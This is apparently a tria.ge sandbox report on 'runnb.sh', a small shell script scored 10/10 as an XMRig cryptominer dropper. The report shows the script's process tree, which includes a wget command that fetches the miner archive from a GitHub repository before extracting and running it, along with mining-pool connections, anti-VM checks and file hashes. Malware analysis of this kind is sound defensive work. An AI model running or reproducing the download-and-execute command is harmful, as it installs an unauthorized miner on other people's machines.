Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

runnb.sh

ubuntu-20.04-amd64

10

runnb.sh

ubuntu-22.04-amd64

10

runnb.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    1799s
  • max time network
    1792s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    16/10/2024, 23:47 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    runnb.sh

  • Size

    160B

  • MD5

    87ea8773efcca67a4f2ce3e1ba1d1ff8

  • SHA1

    0770e97785f007f7a3bc9d7e35a72b16895c366d

  • SHA256

    765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01

  • SHA512

    df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514

Score
10/10
xmrigantivmdiscoveryminer

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Executes dropped EXE 1 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

    antivm
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

    discovery
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads CPU attributes 1 TTPs 45 IoCs
    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 27 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:1572
      • /usr/bin/wget
        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
        2⤵
        • Writes file to tmp directory
        PID:1573
      • /usr/bin/tar
        tar xvf xmrigtar.tar.gz
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1578
        • /usr/local/sbin/gzip
          gzip -d
          3⤵
            PID:1584
          • /usr/local/bin/gzip
            gzip -d
            3⤵
              PID:1584
            • /usr/sbin/gzip
              gzip -d
              3⤵
                PID:1584
              • /usr/bin/gzip
                gzip -d
                3⤵
                  PID:1584
              • /usr/bin/chmod
                2⤵
                  PID:1586
                • /tmp/xmrig-6.22.0/xmrig
                  2⤵
                  • Executes dropped EXE
                  • Checks hardware identifiers (DMI)
                  • Reads hardware information
                  • Checks CPU configuration
                  • Reads CPU attributes
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:1587

              Network

              • flag-us
                DNS
                github.com
                Remote address:
                8.8.8.8:53
                Request
                github.com
                IN A
                Response
                github.com
                IN A
                20.26.156.215
              • flag-us
                DNS
                github.com
                Remote address:
                8.8.8.8:53
                Request
                github.com
                IN AAAA
                Response
              • flag-us
                DNS
                raw.githubusercontent.com
                Remote address:
                8.8.8.8:53
                Request
                raw.githubusercontent.com
                IN A
                Response
                raw.githubusercontent.com
                IN A
                185.199.110.133
                raw.githubusercontent.com
                IN A
                185.199.108.133
                raw.githubusercontent.com
                IN A
                185.199.109.133
                raw.githubusercontent.com
                IN A
                185.199.111.133
              • flag-us
                DNS
                raw.githubusercontent.com
                Remote address:
                8.8.8.8:53
                Request
                raw.githubusercontent.com
                IN AAAA
                Response
                raw.githubusercontent.com
                IN AAAA
                2606:50c0:8000::154
                raw.githubusercontent.com
                IN AAAA
                2606:50c0:8001::154
                raw.githubusercontent.com
                IN AAAA
                2606:50c0:8003::154
                raw.githubusercontent.com
                IN AAAA
                2606:50c0:8002::154
              • 20.26.156.215:443
                github.com
                tls
                1.5kB
                 8.2kB
                 15
                11
              • 185.199.110.133:443
                raw.githubusercontent.com
                tls
                30.6kB
                 3.7MB
                 498
                2683
              • 168.235.86.33:3393
                9.8kB
                 11.5kB
                 78
                60
              • 168.235.86.33:3393
                60 B
                 40 B
                 1
                1
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                893 B
                 626 B
                 7
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                1.6kB
                 1.1kB
                 11
                7
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                861 B
                 934 B
                 7
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 626 B
                 6
                5
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                833 B
                 574 B
                 6
                4
              • 168.235.86.33:3393
                16.3kB
                 22.5kB
                 138
                103
              • 224.0.0.251:5353
                292 B
                 4
              • 8.8.8.8:53
                github.com
                dns
                67 B
                 83 B
                 1
                1

                DNS Request

                github.com

                DNS Response

                20.26.156.215

              • 8.8.8.8:53
                github.com
                dns
                67 B
                 132 B
                 1
                1

                DNS Request

                github.com

              • 8.8.8.8:53
                raw.githubusercontent.com
                dns
                82 B
                 146 B
                 1
                1

                DNS Request

                raw.githubusercontent.com

                DNS Response

                185.199.110.133
                185.199.108.133
                185.199.109.133
                185.199.111.133

              • 8.8.8.8:53
                raw.githubusercontent.com
                dns
                82 B
                 194 B
                 1
                1

                DNS Request

                raw.githubusercontent.com

                DNS Response

                2606:50c0:8000::154
                2606:50c0:8001::154
                2606:50c0:8003::154
                2606:50c0:8002::154

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /root/.wget-hsts
                Filesize

                215B

                MD5

                afb5928f4ccf51581f8ba150e814812c

                SHA1

                b8c3fbab40f191f1e161ffdade3ac0f5c66a25bd

                SHA256

                eebbdbafbbe840fbb62e1b79d555dbb6d9f558013aba6385924ca48697e00ecb

                SHA512

                f9567d8ce892a46585da43191b3820248b87f39ed21541797abccfe977d884e906d6da48f16459b7a69a0435e58ba18827715a7d33c3dd9d0f182965bd8de2b6

                Download Submit

              • /tmp/xmrig-6.22.0/SHA256SUMS
                Filesize

                150B

                MD5

                19f1bb08cf8997837b1f738b76ca97e9

                SHA1

                c497499ad539d6ef580c6c932a2633fe820abded

                SHA256

                99ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa

                SHA512

                fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230

                Download Submit

              • /tmp/xmrig-6.22.0/config.json
                Filesize

                919B

                MD5

                0a9b0011891eae4086d16c3364e772ff

                SHA1

                98fe8a7b5b6b0c0aa7635e4e388c67c863772b69

                SHA256

                1aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd

                SHA512

                9e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554

                Download Submit

              • /tmp/xmrig-6.22.0/config.json
                Filesize

                1KB

                MD5

                1879742a3f028a8e227f3b6b51756269

                SHA1

                20365c0cf35e787f525baede3646cfdfe6001cba

                SHA256

                4042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5

                SHA512

                e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731

                Download Submit

              • /tmp/xmrig-6.22.0/xmrig
                Filesize

                7.7MB

                MD5

                466d426a411add606457183e2b648960

                SHA1

                2b7d2dda0fccc79542d50251ef6b307b43a0131c

                SHA256

                e5617635d8a9497560a41fbeea5bde8d585bb2a619d4901b4f1f31bd3455076f

                SHA512

                9eb3dbad333615665fd7c70b8fd3cb012039faeadbf42f8d757e68dd26820611630c1a2a8c283fbd74b9d11ce57337030965e4d63f0d44c3d2ac4c3e1468bd59

                Download Submit

              • /tmp/xmrigtar.tar.gz
                Filesize

                3.4MB

                MD5

                ccdb2d76041e107dff38f962d65b3d4b

                SHA1

                e9360c43398f3725b0a3eb87e2448ac416d96be3

                SHA256

                11d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f

                SHA512

                f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d

                Download Submit

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.